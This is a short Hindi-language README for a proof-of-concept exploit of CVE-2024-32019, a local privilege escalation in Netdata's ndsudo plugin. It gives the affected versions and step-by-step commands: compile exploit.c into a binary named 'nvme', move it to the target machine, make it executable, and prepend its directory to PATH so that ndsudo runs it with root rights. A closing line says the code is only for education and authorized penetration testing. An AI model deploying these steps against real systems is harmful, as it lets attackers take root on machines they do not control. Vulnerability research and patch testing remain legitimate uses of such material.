
CVE-2024-32019 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Netdata के ndsudo प्लगइन में अविश्वसनीय खोज पथ के माध्यम से स्थानीय विशेषाधिकार वृद्धि का प्रदर्शन करता है। इसमें संकलन निर्देश और तैनाती के चरण शामिल हैं।
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169CVE-2024-32019 — ndsudo स्थानीय विशेषाधिकार उन्नयन अविश्वसनीय खोज पथ के माध्यम से।
x86_64-linux-gnu-gcc -o nvme exploit.c -static
संकलित बाइनरी को असुरक्षित मशीन पर स्थानांतरित करें।
इसे निष्पादन योग्य बनाएं:
chmod +x nvme
PATH हेरफेर के माध्यम से असुरक्षित बाइनरी का शोषण करें (उसी पथ का उपयोग करें जहाँ आपने अपनी बाइनरी अपलोड की है):
PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
यह प्रूफ ऑफ कॉन्सेप्ट (PoC) कोड केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है।